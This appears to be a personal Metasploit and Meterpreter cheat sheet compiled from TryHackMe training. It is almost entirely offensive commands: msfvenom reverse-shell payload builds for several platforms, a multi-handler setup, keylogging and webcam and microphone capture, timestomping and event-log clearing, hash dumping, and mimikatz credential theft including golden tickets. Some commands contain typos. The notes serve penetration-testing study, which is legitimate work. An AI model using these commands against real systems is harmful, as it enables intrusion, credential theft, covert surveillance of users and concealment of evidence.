Metasploit and Meterpreter
Basic commands
show payloads \\to list all payloads
info \alternative of show options, give more details
search type:auxiliary telnet \\to limit search to particular module types
unset \\to revert settings options
setg \to set option for all current and future selected modules
exploit -z \\background the session
getpid \\ get process ID
Finding files in meterpreter
search -f flag*.txt (in meterpreter)
Payloads
List Payloads
msfvenom -l payloads
msfvenom --list formats \\output formats
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex
Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen. The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.
Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
If msf is having some error start database service
service postgresql start
Multi handler
use exploit/muli.handler
exploit -j -z //runs in background
Useful commands meterpreter
sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime
To modify the timestamp MACE (modified, accessed,created,entry) attributes
timestomp secret.ext -m "2/11/2022 8:10:03"
To view timestamp entries
timestomp secret.ext -v
Hidden files in shell
First get the shell, then use the following command.
dir /a:h
List all running services in shell
sc querytex type=service state=all
Other shell commands
netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system
Dumping hashes in meterpreter
hashdump // or try the following
use post/windows/gather/smart_hashdump

Metasploit Scanners
scanner/discovery/udp_sweep
auxiliary/scanner/http/http_version
Meterpreter commands
Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started. Core commands
background
: Backgrounds the current sessionexit
: Terminate the Meterpreter sessionguid
: Get the session GUID (Globally Unique Identifier)help
: Displays the help menuinfo
: Displays information about a Post moduleirb
: Opens an interactive Ruby shell on the current sessionload
: Loads one or more Meterpreter extensionsmigrate
: Allows you to migrate Meterpreter to another processrun
: Executes a Meterpreter script or Post modulesessions
: Quickly switch to another sessionps:
Running Processes
File system commands
cd
: Will change directoryls
: Will list files in the current directory (dir will also work)pwd
: Prints the current working directoryedit
: will allow you to edit a filecat
: Will show the contents of a file to the screenrm
: Will delete the specified filesearch
: Will search for filesupload
: Will upload a file or directorydownload
: Will download a file or directory
Networking commands
arp
: Displays the host ARP (Address Resolution Protocol) cacheifconfig
: Displays network interfaces available on the target systemnetstat
: Displays the network connectionsportfwd
: Forwards a local port to a remote serviceroute
: Allows you to view and modify the routing table
System commands
clearev
: Clears the event logsexecute
: Executes a commandgetpid
: Shows the current process identifiergetuid
: Shows the user that Meterpreter is running askill
: Terminates a processpkill
: Terminates processes by nameps
: Lists running processesreboot
: Reboots the remote computershell
: Drops into a system command shellshutdown
: Shuts down the remote computersysinfo
: Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu)
idletime
: Returns the number of seconds the remote user has been idlekeyscan_dump
: Dumps the keystroke bufferkeyscan_start
: Starts capturing keystrokeskeyscan_stop
: Stops capturing keystrokesscreenshare
: Allows you to watch the remote user's desktop in real timescreenshot
: Grabs a screenshot of the interactive desktoprecord_mic
: Records audio from the default microphone for X secondswebcam_chat
: Starts a video chatwebcam_list
: Lists webcamswebcam_snap
: Takes a snapshot from the specified webcamwebcam_stream
: Plays a video stream from the specified webcamgetsystem
: Attempts to elevate your privilege to that of local systemhashdump
: Dumps the contents of the SAM database
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.
Meterpreter Modules
you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.
Loading Python
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!
meterpreter >
The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.
Gathering further information about the target system.
Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
Privilege escalation.
Lateral movement.
Once any additional tool is loaded using the load
command, you will see new options on the help
menu. The example below shows commands added for the Kiwi module (using the load kiwi
command).
Loading Kiwi (mimikatz)
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
These will change according to the loaded menu, so running the help
command after loading a module is always a good idea.The updated help menu
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Gather domain info with post exploitation module
use post/windows/gather/enum_domain
set SESSIONS 1
exploit
Shares with metasploit
post/windows/gather/enum_shares

Dumping hashes
hashdump
If it does not work migrate to some privilede process like lass.exe and then try the command
ps
migrate 764
hashdump
Revert to original user
if you pivot somewhere, we can move back with following
rev2self
Last updated